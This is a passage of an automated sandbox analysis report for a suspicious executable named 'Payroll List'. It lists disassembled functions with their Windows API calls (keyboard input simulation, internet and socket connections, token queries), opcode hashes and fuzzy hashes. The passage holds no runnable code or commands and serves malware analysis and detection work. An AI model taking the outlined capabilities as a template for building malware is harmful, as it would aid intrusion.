                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow
                                                                    • String ID:
                                                                    • API String ID: 3379773720-0
                                                                    • Opcode ID: 50523f3f97a06497fd845b3dc4b5720db05fa1993626b5e89bd52a5af672d924
                                                                    • Instruction ID: b95ae9abb241bfef7031d4d593e962fb244532c5e83bf08cb9dcc4849bda6cf2
                                                                    • Opcode Fuzzy Hash: 50523f3f97a06497fd845b3dc4b5720db05fa1993626b5e89bd52a5af672d924
                                                                    • Instruction Fuzzy Hash: B241E331A00318AFDF21DF54D845FEE7BB9AF59701F000019FE15AB281DB709A59CBA1
                                                                    Function 0016390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00163966
                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00163982
                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 001639EF
                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00163A4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 81ce5ebe6ab9f8dcb932ea5d829be5822cc13b13dcf6f8a06fb3b3c6b7dc218d
                                                                    • Instruction ID: 56dbae8dedf3974b53cb922b585000c0483090cae36015a211f5d3c64f823ea8
                                                                    • Opcode Fuzzy Hash: 81ce5ebe6ab9f8dcb932ea5d829be5822cc13b13dcf6f8a06fb3b3c6b7dc218d
                                                                    • Instruction Fuzzy Hash: 63411670E04648AEEF248B64CC09BFDBBB9AB55315F04015AF4E2932C1C7B48EA5DB65
                                                                    Function 0018B544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0018B5D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: dc09e83782529aed542a272754b68e1c5e921f5222816233451e87cd795dd904
                                                                    • Instruction ID: 49a13a77e4c06c49f2123f992e8f9cce3c327f0e052c974fee27643fc2f329c4
                                                                    • Opcode Fuzzy Hash: dc09e83782529aed542a272754b68e1c5e921f5222816233451e87cd795dd904
                                                                    • Instruction Fuzzy Hash: 8431E074608204BFEF34AF58DCC9FAC7B65AB06310F644201FA52D66E1E730AB808F51
                                                                    Function 0018D7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0018D807
                                                                    • GetWindowRect.USER32(?,?), ref: 0018D87D
                                                                    • PtInRect.USER32(?,?,0018ED5A), ref: 0018D88D
                                                                    • MessageBeep.USER32(00000000), ref: 0018D8FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: e77a77892410b262a4c36db6cbe42afceca20113c2435613926fd073608c3aad
                                                                    • Instruction ID: f9f585d5709f02904f00b29aa9aec1bae3ef4841116fa8aa898a80ce7dd09ec0
                                                                    • Opcode Fuzzy Hash: e77a77892410b262a4c36db6cbe42afceca20113c2435613926fd073608c3aad
                                                                    • Instruction Fuzzy Hash: 54418F70A00258EFCB11EF99E884BAD7BF5FB4A314F1981A9E5159B690D730EA81CF40
                                                                    Function 00163A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00163AB8
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00163AD4
                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00163B34
                                                                    • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00163B92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: e2d419d45f9cab0a3f692fc89f7ddd1453961974e659101b81744ab4a10892fe
                                                                    • Instruction ID: 710e9d157b2b84ab893bce2359f81ed30e4134975694b5af18bfe0a93e5cbf38
                                                                    • Opcode Fuzzy Hash: e2d419d45f9cab0a3f692fc89f7ddd1453961974e659101b81744ab4a10892fe
                                                                    • Instruction Fuzzy Hash: 1E313670E00658AEFF348BA4CC19BFEBBB99B56310F04015AE892932D1C7758FA5D761
                                                                    Function 00154004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00154038
                                                                    • __isleadbyte_l.LIBCMT ref: 00154066
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00154094
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001540CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 7684ab08638703970283e67907a889386b421511f4dc827deb53018a95846939
                                                                    • Instruction ID: a7d93d6055674bb1cf9d31ebd47189da43d3447545568502f92f7917d07aa7c6
                                                                    • Opcode Fuzzy Hash: 7684ab08638703970283e67907a889386b421511f4dc827deb53018a95846939
                                                                    • Instruction Fuzzy Hash: E331CE30604206EFDB219F65C844BEA7BA5BF41316F254128FA618F0E0E731D8E8DB90
                                                                    Function 00187CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00187CB9
                                                                      • Part of subcall function 00165F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00165F6F
                                                                      • Part of subcall function 00165F55: GetCurrentThreadId.KERNEL32 ref: 00165F76
                                                                      • Part of subcall function 00165F55: AttachThreadInput.USER32(00000000,?,0016781F), ref: 00165F7D
                                                                    • GetCaretPos.USER32(?), ref: 00187CCA
                                                                    • ClientToScreen.USER32(00000000,?), ref: 00187D03
                                                                    • GetForegroundWindow.USER32 ref: 00187D09
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 1e30d3d13d6b0f02b9a3392d02e5c104b7b3b959ccb4cce246dfc92d4c481024
                                                                    • Instruction ID: 13ab99fcc562ac23077f8b177b9623204e40f6793d892986b683b4f67bd2b4b8
                                                                    • Opcode Fuzzy Hash: 1e30d3d13d6b0f02b9a3392d02e5c104b7b3b959ccb4cce246dfc92d4c481024
                                                                    • Instruction Fuzzy Hash: 5E31FE71900108AFDB10EFA5DC459EFBBF9EF69314F118466E819E7211DB319E458BA0
                                                                    Function 0018F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • GetCursorPos.USER32(?), ref: 0018F211
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0019E4C0,?,?,?,?,?), ref: 0018F226
                                                                    • GetCursorPos.USER32(?), ref: 0018F270
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0019E4C0,?,?,?), ref: 0018F2A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: 8e60edc3fedc92a303286eeb55faf3b34607f2eeac0255ad110c10d6858b6fb8
                                                                    • Instruction ID: e5e4fd85a0adb6d374b96df96b797072ed76a479115748871578acf3280695ab
                                                                    • Opcode Fuzzy Hash: 8e60edc3fedc92a303286eeb55faf3b34607f2eeac0255ad110c10d6858b6fb8
                                                                    • Instruction Fuzzy Hash: D2219139600518BFCB159F94D898EEEBBB6FF0A750F084069F9055B6A1D3309E92DF60
                                                                    Function 0017431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00174358
                                                                      • Part of subcall function 001743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174401
                                                                      • Part of subcall function 001743E2: InternetCloseHandle.WININET(00000000), ref: 0017449E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: bdd4a76e68d0873c98534d9b26829389aa485937e00d0b71b181fd5abd464b50
                                                                    • Instruction ID: 406b0b3f13728b049b5fa125779695364549ba695ff4aee66b6a33a4972959ad
                                                                    • Opcode Fuzzy Hash: bdd4a76e68d0873c98534d9b26829389aa485937e00d0b71b181fd5abd464b50
                                                                    • Instruction Fuzzy Hash: 7321F631200A11BFDB169F60DC01FBBB7B9FF54714F10801AFA5D96A50DB7198609B90
                                                                    Function 00188A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00188AA6
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00188AC0
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00188ACE
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00188ADC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: cd2c3ce5afd99a7d3fdce39e5fbe49a9387cf6bf8a3a8ff7621fa51df5b2277f
                                                                    • Instruction ID: 85ef353b3d34a3892d3b904dd472409d1b3907f0b1803539f609feca321d5dcb
                                                                    • Opcode Fuzzy Hash: cd2c3ce5afd99a7d3fdce39e5fbe49a9387cf6bf8a3a8ff7621fa51df5b2277f
                                                                    • Instruction Fuzzy Hash: DB11E231305520AFDB18AB18EC05FBE7799FF9A320F144119F816C76E2CB74AD508B90
                                                                    Function 00178A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00178AE0
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00178AF2
                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00178AFF
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178B16
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastacceptselect
                                                                    • String ID:
                                                                    • API String ID: 385091864-0
                                                                    • Opcode ID: caa4d6084baa66204affdb95f68fab71fff294bd63bd6d96af598dac50811c3e
                                                                    • Instruction ID: 06f5e5e23e787713e7fb9c7a372e623ac0ea9e5c8d700ad82095e8a042b09f2b
                                                                    • Opcode Fuzzy Hash: caa4d6084baa66204affdb95f68fab71fff294bd63bd6d96af598dac50811c3e
                                                                    • Instruction Fuzzy Hash: EB21A872A001249FC7159F68DC85A9EBBFCEF5A314F008169F84AD7651DB74D981CF90
                                                                    Function 00160AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00161E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00160ABB,?,?,?,0016187A,00000000,000000EF,00000119,?,?), ref: 00161E77
                                                                      • Part of subcall function 00161E68: lstrcpyW.KERNEL32(00000000,?,?,00160ABB,?,?,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00161E9D
                                                                      • Part of subcall function 00161E68: lstrcmpiW.KERNEL32(00000000,?,00160ABB,?,?,?,0016187A,00000000,000000EF,00000119,?,?), ref: 00161ECE
                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00160AD4
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00160AFA
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0016187A,00000000,000000EF,00000119,?,?,00000000), ref: 00160B2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 9d868993641b7b0733bf93e8894af52bb45d48f4b8e516d0f277d5035229679a
                                                                    • Instruction ID: c216dd3ce8eb1f8456f4aaaaa6f26e2fde86e0620982f2268aac37345ea0882c
                                                                    • Opcode Fuzzy Hash: 9d868993641b7b0733bf93e8894af52bb45d48f4b8e516d0f277d5035229679a
                                                                    • Instruction Fuzzy Hash: 7611963A200305AFDB269F24DC45D7A77A9FF59354F80806AE806CB250EB71D851D7E1
                                                                    Function 00152F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00152FB5
                                                                      • Part of subcall function 0014395C: __FF_MSGBANNER.LIBCMT ref: 00143973
                                                                      • Part of subcall function 0014395C: __NMSG_WRITE.LIBCMT ref: 0014397A
                                                                      • Part of subcall function 0014395C: RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000001,00000000,?,?,0013F507,?,0000000E), ref: 0014399F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 2b5be5eda4fc73cf55df12f98e2df7c91207e23a71ac943c210ceba53154932c
                                                                    • Instruction ID: e7ff8ae5ae6a45885446fe151d00b159b9329b3167e2def1237d9b6a6550502a
                                                                    • Opcode Fuzzy Hash: 2b5be5eda4fc73cf55df12f98e2df7c91207e23a71ac943c210ceba53154932c
                                                                    • Instruction Fuzzy Hash: 9411E732508312EBCF223FB0FC4466A3BA4AF253A1F204425FC699F1E1DB34C9848690
                                                                    Function 0016058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001605AC
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001605C7
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001605DD
                                                                    • FreeLibrary.KERNEL32(?), ref: 00160632
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                    • String ID:
                                                                    • API String ID: 3137044355-0
                                                                    • Opcode ID: fa7d9036a178d6e3228273d757cf86cddb04f790b5ee3c2277ad3b82cb8ca11c
                                                                    • Instruction ID: cd0e947e5fceaa986e8f118ffb76faf6521dac25b5fef577bfb97ef52c979341
                                                                    • Opcode Fuzzy Hash: fa7d9036a178d6e3228273d757cf86cddb04f790b5ee3c2277ad3b82cb8ca11c
                                                                    • Instruction Fuzzy Hash: 4E218E71901209EFDB228F95EC88ADBBBB8EF48700F01846DE51796550D770EA65DF50
                                                                    Function 00166713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00166733
                                                                    • _memset.LIBCMT ref: 00166754
                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001667A6
                                                                    • CloseHandle.KERNEL32(00000000), ref: 001667AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                    • String ID:
                                                                    • API String ID: 1157408455-0
                                                                    • Opcode ID: 0be0dc2f2c42436596ba48fb9b139c996e814838778acb2334a3996b92c47300
                                                                    • Instruction ID: db920fe0c33d9fbaeaf713d08c104f03a29fc870379799b0ab432a304608c9c3
                                                                    • Opcode Fuzzy Hash: 0be0dc2f2c42436596ba48fb9b139c996e814838778acb2334a3996b92c47300
                                                                    • Instruction Fuzzy Hash: 6B1106B29012287AE7209BA5AC4DFABBABCEF45724F10419AF505E71D0D3704E80CBA4
                                                                    Function 0015B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0015AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0015AA79
                                                                      • Part of subcall function 0015AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0015AA83
                                                                      • Part of subcall function 0015AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0015AA92
                                                                      • Part of subcall function 0015AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0015AA99
                                                                      • Part of subcall function 0015AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0015AAAF
                                                                    • GetLengthSid.ADVAPI32(?,00000000,0015ADE4,?,?), ref: 0015B21B
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0015B227
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0015B22E
